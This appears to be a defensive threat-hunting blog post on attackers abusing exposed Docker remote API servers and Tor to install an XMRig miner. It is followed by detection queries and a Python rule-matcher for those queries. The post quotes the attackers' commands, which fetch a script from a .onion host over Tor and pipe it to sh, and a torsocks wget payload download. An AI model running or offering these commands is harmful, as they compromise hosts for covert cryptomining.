173. Adversaries Abuse Docker Remote API Servers and Tor Network
Hello everyone!
We talk a lot about Windows threats, but let's look at Linux and containers today, as these are common targets for actors distributing cryptominers.
According to this report by Trend Micro, the threat actors abused a Docker remote API server to create a new container. The following base64-encoded command was executed:
apk update && apk add curl tor && tor & while ! curl -fs --proxy socks5h://localhost:9050 https://checkip [.]amazonaws.com; do sleep 10; done; curl -fs --proxy socks5h://localhost:9050 http[:]//wtxqf54djhp5pskv2lfyduub5ievxbyvlzjgjopk6hxge5umombr63ad[.]onion/static/docker-init.sh | sh
Despite the fact that it was executed in the adversary-created container, it's good to have relevant detections. For example, abusing apk to set up Tor:
event_type: "processcreatenix"
AND
proc_file_name: "apk"
AND
cmdline: "add" AND "tor"
One more thing - using cURL over Tor:
event_type: "processcreatenix"
AND
proc_file_name: "curl"
AND
cmdline: ("proxy" AND "socks5h" AND "9050")
Also, the threat actors used torsocks to route traffic through the Tor network and downloaded a Zstandard-compressed (.zst) payload:
torsocks wget -O /tmp/system.zst "http://2h573qd[.]onion:9000/binary/system-linux-$( uname -m).zst"
Here, for example, we can hunt for torsocks abuse to run wget or curl:
event_type: "processcreatenix"
AND
proc_file_name: "torsocks"
AND
cmdline: ("wget" OR "curl")
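The three hunting queries above express the same logic; here they are implemented as detection rules run over a few constructed process-creation events, as an added example that is not part of the original post. Field names follow the queries (event_type, proc_file_name, cmdline); the keyword matching tokenises the command line so that "--proxy socks5h://localhost:9050" yields the tokens "proxy", "socks5h" and "9050", the sample .onion host is a placeholder.

```python
import json
import re
from typing import Callable, Dict, List, Tuple

# Constructed JSON-lines telemetry (not from the Trend Micro report): three
# events mirroring the observed activity plus three benign look-alikes.
SAMPLE_LOG = """
{"event_type": "processcreatenix", "proc_file_name": "apk", "cmdline": "apk add curl tor"}
{"event_type": "processcreatenix", "proc_file_name": "curl", "cmdline": "curl -fs --proxy socks5h://localhost:9050 https://checkip.amazonaws.com"}
{"event_type": "processcreatenix", "proc_file_name": "torsocks", "cmdline": "torsocks wget -O /tmp/system.zst http://example.onion:9000/system.zst"}
{"event_type": "processcreatenix", "proc_file_name": "apk", "cmdline": "apk add curl"}
{"event_type": "processcreatenix", "proc_file_name": "curl", "cmdline": "curl -fs https://example.com"}
{"event_type": "processcreatenix", "proc_file_name": "torsocks", "cmdline": "torsocks ssh user@host"}
"""

# Each rule: (name, expected proc_file_name, predicate over the cmdline tokens).
RULES: List[Tuple[str, str, Callable[[set], bool]]] = [
    ("apk installs tor", "apk", lambda t: {"add", "tor"} <= t),
    ("curl over Tor SOCKS proxy", "curl", lambda t: {"proxy", "socks5h", "9050"} <= t),
    ("torsocks wraps a downloader", "torsocks", lambda t: bool(t & {"wget", "curl"})),
]


def parse_events(text: str) -> List[Dict]:
    """Parse JSON lines into event dicts, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def tokens(cmdline: str) -> set:
    """Split a command line into lowercase alphanumeric tokens, like a
    full-text index would, so URLs and flags match their keyword parts."""
    return {t.lower() for t in re.findall(r"[A-Za-z0-9]+", cmdline)}


def match_rules(event: Dict) -> List[str]:
    """Return the names of all rules that fire on a single Linux process event."""
    if event.get("event_type") != "processcreatenix":
        return []
    toks = tokens(event.get("cmdline", ""))
    return [name for name, proc, cond in RULES
            if event.get("proc_file_name") == proc and cond(toks)]


def hunt(events: List[Dict]) -> List[Tuple[int, List[str]]]:
    """Return (event index, matched rule names) for every event that fires."""
    results = []
    for i, event in enumerate(events):
        hits = match_rules(event)
        if hits:
            results.append((i, hits))
    return results


if __name__ == "__main__":
    for idx, names in hunt(parse_events(SAMPLE_LOG)):
        print(f"event {idx}: {', '.join(names)}")
```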
The payload is a dropper for the XMRig cryptocurrency miner! That's it!
See you tomorrow!